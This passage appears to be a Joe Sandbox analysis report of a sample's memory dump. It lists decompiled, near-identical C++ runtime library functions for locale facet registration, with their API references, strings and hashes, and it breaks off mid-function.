0x0044647e
0x00446485
0x00446488
0x00446492
0x004464a0
0x004464a0
0x004464a5
0x004464aa
0x004464b0
0x004464b6
0x00446473
0x00446473
0x00446473
0x00446471
0x004464bc
0x004464c3
0x004464cf

APIs

__EH_prolog3.LIBCMT ref: 0044643A
std::_Lockit::_Lockit.LIBCPMT ref: 00446444

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

collate.LIBCPMT ref: 0044647E
std::bad_exception::bad_exception.LIBCMT ref: 00446492
__CxxThrowException@8.LIBCMT ref: 004464A0
std::locale::facet::_Facet_Register.LIBCPMT ref: 004464B6

Strings

bad cast, xrefs: 0044648A
(FF, xrefs: 00446453

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcollatestd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: (FF$bad cast
API String ID: 2346505839-3388733624
Opcode ID: e79c2d430c899a32df42808484ff02dcfec15a497dd2303eea78296c63c6034f
Instruction ID: b3ffa1b371fb2198051a84da58705e797ec2d207a067125d2f86e317020d16b8
Opcode Fuzzy Hash: e79c2d430c899a32df42808484ff02dcfec15a497dd2303eea78296c63c6034f
Instruction Fuzzy Hash: CD01A171900115A7DF05EBA1DC42ABE72346F81764F64052FF8207B2E2DB7C9904879E

Uniqueness

Uniqueness Score: -1.00%

Function 0043D58C Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D58C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645ac; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043C9C4(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645ac =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d58c
0x0043d593
0x0043d59d
0x0043d5a2
0x0043d5a8
0x0043d5b1
0x0043d5b4
0x0043d5b9
0x0043d5bd
0x0043d5c2
0x0043d5c6
0x0043d5ca
0x0043d5d0
0x0043d5d6
0x0043d5d7
0x0043d5de
0x0043d5e1
0x0043d5eb
0x0043d5f9
0x0043d5f9
0x0043d5fe
0x0043d603
0x0043d609
0x0043d60f
0x0043d5cc
0x0043d5cc
0x0043d5cc
0x0043d5ca
0x0043d615
0x0043d61c
0x0043d628

APIs

__EH_prolog3.LIBCMT ref: 0043D593
std::_Lockit::_Lockit.LIBCPMT ref: 0043D59D

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

ctype.LIBCPMT ref: 0043D5D7
std::bad_exception::bad_exception.LIBCMT ref: 0043D5EB
__CxxThrowException@8.LIBCMT ref: 0043D5F9
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D60F

Strings

bad cast, xrefs: 0043D5E3
T5F, xrefs: 0043D5AC

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: T5F$bad cast
API String ID: 3532015510-2407202879
Opcode ID: bb27cf5c3ab2a6b4b86c57b18a8b6127791819771669c38f66567e4cb0741f8f
Instruction ID: f7d26be99abe681dd1e7350bed3b04b7f045d8223eca97c77f10686eadd70cc9
Opcode Fuzzy Hash: bb27cf5c3ab2a6b4b86c57b18a8b6127791819771669c38f66567e4cb0741f8f
Instruction Fuzzy Hash: DA01A171D00119A7CF05EBA19852ABEB2356F44328F64012FF4217B2E2DF7C99048B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D629 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D629(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645b0; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CA4B(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645b0 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d629
0x0043d630
0x0043d63a
0x0043d63f
0x0043d645
0x0043d64e
0x0043d651
0x0043d656
0x0043d65a
0x0043d65f
0x0043d663
0x0043d667
0x0043d66d
0x0043d673
0x0043d674
0x0043d67b
0x0043d67e
0x0043d688
0x0043d696
0x0043d696
0x0043d69b
0x0043d6a0
0x0043d6a6
0x0043d6ac
0x0043d669
0x0043d669
0x0043d669
0x0043d667
0x0043d6b2
0x0043d6b9
0x0043d6c5

APIs

__EH_prolog3.LIBCMT ref: 0043D630
std::_Lockit::_Lockit.LIBCPMT ref: 0043D63A

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

ctype.LIBCPMT ref: 0043D674
std::bad_exception::bad_exception.LIBCMT ref: 0043D688
__CxxThrowException@8.LIBCMT ref: 0043D696
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D6AC

Strings

bad cast, xrefs: 0043D680
`5F, xrefs: 0043D649

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowctypestd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: `5F$bad cast
API String ID: 3532015510-2555645252
Opcode ID: 17ba3293085874938e8e85c78c01ec65a13ce8b6e7b0d3635e389be3a92f5fad
Instruction ID: 9f4d79e732f046bec58782bca312d3e9b718b7a0b50a288904755480d6f7d69f
Opcode Fuzzy Hash: 17ba3293085874938e8e85c78c01ec65a13ce8b6e7b0d3635e389be3a92f5fad
Instruction Fuzzy Hash: AE01E131D00214A7CF05EBA1A822AAE7274AF84724F64012FF4217B2E2DF7C9A04879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D6C6 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D6C6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645b4; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CB5A(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645b4 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d6c6
0x0043d6cd
0x0043d6d7
0x0043d6dc
0x0043d6e2
0x0043d6eb
0x0043d6ee
0x0043d6f3
0x0043d6f7
0x0043d6fc
0x0043d700
0x0043d704
0x0043d70a
0x0043d710
0x0043d711
0x0043d718
0x0043d71b
0x0043d725
0x0043d733
0x0043d733
0x0043d738
0x0043d73d
0x0043d743
0x0043d749
0x0043d706
0x0043d706
0x0043d706
0x0043d704
0x0043d74f
0x0043d756
0x0043d762

APIs

__EH_prolog3.LIBCMT ref: 0043D6CD
std::_Lockit::_Lockit.LIBCPMT ref: 0043D6D7

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043D711
std::bad_exception::bad_exception.LIBCMT ref: 0043D725
__CxxThrowException@8.LIBCMT ref: 0043D733
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D749

Strings

bad cast, xrefs: 0043D71D
4FF, xrefs: 0043D6E6

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: 4FF$bad cast
API String ID: 1676052248-3236518085
Opcode ID: 547923ca89c67597a951cb6022976e182fd9d64b55fa3ad2b5d962eb0080c540
Instruction ID: e5db74cc2039d0b2e1864e85c23e4acee649d070777a6e78c1b4e694788c34ae
Opcode Fuzzy Hash: 547923ca89c67597a951cb6022976e182fd9d64b55fa3ad2b5d962eb0080c540
Instruction Fuzzy Hash: 1701AD31D00215ABCF05EBA1A952ABEB274AF84724F64012FF4117B2E1DB7C9905879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D763 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D763(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645b8; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CBE4(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645b8 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d763
0x0043d76a
0x0043d774
0x0043d779
0x0043d77f
0x0043d788
0x0043d78b
0x0043d790
0x0043d794
0x0043d799
0x0043d79d
0x0043d7a1
0x0043d7a7
0x0043d7ad
0x0043d7ae
0x0043d7b5
0x0043d7b8
0x0043d7c2
0x0043d7d0
0x0043d7d0
0x0043d7d5
0x0043d7da
0x0043d7e0
0x0043d7e6
0x0043d7a3
0x0043d7a3
0x0043d7a3
0x0043d7a1
0x0043d7ec
0x0043d7f3
0x0043d7ff

APIs

__EH_prolog3.LIBCMT ref: 0043D76A
std::_Lockit::_Lockit.LIBCPMT ref: 0043D774

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043D7AE
std::bad_exception::bad_exception.LIBCMT ref: 0043D7C2
__CxxThrowException@8.LIBCMT ref: 0043D7D0
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D7E6

Strings

dFF, xrefs: 0043D783
bad cast, xrefs: 0043D7BA

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast$dFF
API String ID: 1676052248-3746092403
Opcode ID: 442872a81060b0f5d165e2100a971559f2436a2be0c35d120923a51977ad6e60
Instruction ID: 001240599a81477fdbdbb9b962c268349d35e94a974cf1e40eecbb2b3c742da3
Opcode Fuzzy Hash: 442872a81060b0f5d165e2100a971559f2436a2be0c35d120923a51977ad6e60
Instruction Fuzzy Hash: FE01A131D0021597CF05FBA1A852AAEB2356F84764F64012FF4117B2E2DB7C9904C79D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D800 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D800(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645bc; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CCA0(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645bc =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d800
0x0043d807
0x0043d811
0x0043d816
0x0043d81c
0x0043d825
0x0043d828
0x0043d82d
0x0043d831
0x0043d836
0x0043d83a
0x0043d83e
0x0043d844
0x0043d84a
0x0043d84b
0x0043d852
0x0043d855
0x0043d85f
0x0043d86d
0x0043d86d
0x0043d872
0x0043d877
0x0043d87d
0x0043d883
0x0043d840
0x0043d840
0x0043d840
0x0043d83e
0x0043d889
0x0043d890
0x0043d89c

APIs

__EH_prolog3.LIBCMT ref: 0043D807
std::_Lockit::_Lockit.LIBCPMT ref: 0043D811

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

numpunct.LIBCPMT ref: 0043D84B
std::bad_exception::bad_exception.LIBCMT ref: 0043D85F
__CxxThrowException@8.LIBCMT ref: 0043D86D
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D883

Strings

bad cast, xrefs: 0043D857
HFF, xrefs: 0043D820

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrownumpunctstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: HFF$bad cast
API String ID: 1289509941-3785987248
Opcode ID: 5c8ea319954719178698702b55e7bd94ddc40ecf77fbbb5aefdad155fcf04fbd
Instruction ID: 941d9c397af6f6d0231830a21b4e832db27f4441f0c05606a6ee7c53ad98ccab
Opcode Fuzzy Hash: 5c8ea319954719178698702b55e7bd94ddc40ecf77fbbb5aefdad155fcf04fbd
Instruction Fuzzy Hash: 6601AD71D00215A7CF09FBA19812ABE7374AF84364FA4052FF4217B2E1DB7CA9058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D89D Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D89D(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645c0; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CD2A(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645c0 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d89d
0x0043d8a4
0x0043d8ae
0x0043d8b3
0x0043d8b9
0x0043d8c2
0x0043d8c5
0x0043d8ca
0x0043d8ce
0x0043d8d3
0x0043d8d7
0x0043d8db
0x0043d8e1
0x0043d8e7
0x0043d8e8
0x0043d8ef
0x0043d8f2
0x0043d8fc
0x0043d90a
0x0043d90a
0x0043d90f
0x0043d914
0x0043d91a
0x0043d920
0x0043d8dd
0x0043d8dd
0x0043d8dd
0x0043d8db
0x0043d926
0x0043d92d
0x0043d939

APIs

__EH_prolog3.LIBCMT ref: 0043D8A4
std::_Lockit::_Lockit.LIBCPMT ref: 0043D8AE

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

messages.LIBCPMT ref: 0043D8E8
std::bad_exception::bad_exception.LIBCMT ref: 0043D8FC
__CxxThrowException@8.LIBCMT ref: 0043D90A
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D920

Strings

bad cast, xrefs: 0043D8F4
0FF, xrefs: 0043D8BD

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowmessagesstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: 0FF$bad cast
API String ID: 2525416601-3287245754
Opcode ID: 6fec98d3393895b645ae5c4adad093b473b9ab799288d1a757b3efd856013cd8
Instruction ID: 815f7ed70d4b8f1aab4625b7699a6474d546a2caa7dede7bbe490e962047925e
Opcode Fuzzy Hash: 6fec98d3393895b645ae5c4adad093b473b9ab799288d1a757b3efd856013cd8
Instruction Fuzzy Hash: 09018E71D0011997CF05FBA1E802BAE7235AF84764F64012FF4117B2E1DB7C9905879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D93A Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D93A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645c4; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
						_push( *((intOrPtr*)(_t44 + 8)));
						_push(_t44 - 0x10);
						_t23 = E0043CDA9(__ebx, _t32, __edx, _t41, _t43, __eflags);
						__eflags = _t23 - 0xffffffff;
						if(_t23 == 0xffffffff) {
							E004223BB(_t44 - 0x20, "bad cast");
							E00422CB4(_t44 - 0x20, 0x4597cc);
						}
						_t41 =  *((intOrPtr*)(_t44 - 0x10));
						 *0x4645c4 =  *((intOrPtr*)(_t44 - 0x10));
						E00401200();
						E0040D9A4( *((intOrPtr*)(_t44 - 0x10)), _t41);
					} else {
						_t41 = _t43;
					}
				}
				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
				E0040D978(_t44 - 0x14);
				return E0042574F(_t41);
			}

0x0043d93a
0x0043d941
0x0043d94b
0x0043d950
0x0043d956
0x0043d95f
0x0043d962
0x0043d967
0x0043d96b
0x0043d970
0x0043d974
0x0043d978
0x0043d97e
0x0043d984
0x0043d985
0x0043d98c
0x0043d98f
0x0043d999
0x0043d9a7
0x0043d9a7
0x0043d9ac
0x0043d9b1
0x0043d9b7
0x0043d9bd
0x0043d97a
0x0043d97a
0x0043d97a
0x0043d978
0x0043d9c3
0x0043d9ca
0x0043d9d6

APIs

__EH_prolog3.LIBCMT ref: 0043D941
std::_Lockit::_Lockit.LIBCPMT ref: 0043D94B

Part of subcall function 004011C0: std::_Lockit::_Lockit.LIBCPMT ref: 004011CF

codecvt.LIBCPMT ref: 0043D985
std::bad_exception::bad_exception.LIBCMT ref: 0043D999
__CxxThrowException@8.LIBCMT ref: 0043D9A7
std::locale::facet::_Facet_Register.LIBCPMT ref: 0043D9BD

Strings

bad cast, xrefs: 0043D991
XFF, xrefs: 0043D95A

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_H_prolog3RegisterThrowcodecvtstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: XFF$bad cast
API String ID: 1676052248-3987831116
Opcode ID: 2c6c802cf73855e0c491120c6d4bb97736df3b0a080613d2e99266b4cea7a13d
Instruction ID: 7831c588fb458d2e100543140694cb1c730ae8a670e40648999c8e03f318ae27
Opcode Fuzzy Hash: 2c6c802cf73855e0c491120c6d4bb97736df3b0a080613d2e99266b4cea7a13d
Instruction Fuzzy Hash: AA01A1B1D00115ABCF05FBA1E852BAE72346F88364F64012FF4117B2E1DB7C9904879D

Uniqueness

Uniqueness Score: -1.00%

Function 0043D9D7 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 86%

			E0043D9D7(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t17;
				intOrPtr _t18;
				void* _t23;
				intOrPtr _t43;
				void* _t44;

				_push(0x14);
				E004256B0(E00450161, __ebx, __edi, __esi);
				E0040D950(_t44 - 0x14, 0);
				_t43 =  *0x4645c8; // 0x0
				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
				 *((intOrPtr*)(_t44 - 0x10)) = _t43;
				_t17 = E004011C0();
				_t32 =  *((intOrPtr*)(_t44 + 8));
				_t18 = E00401320( *((intOrPtr*)(_t44 + 8)), _t17);
				_t41 = _t18;
				if(_t18 == 0) {
					if(_t43 == 0) {
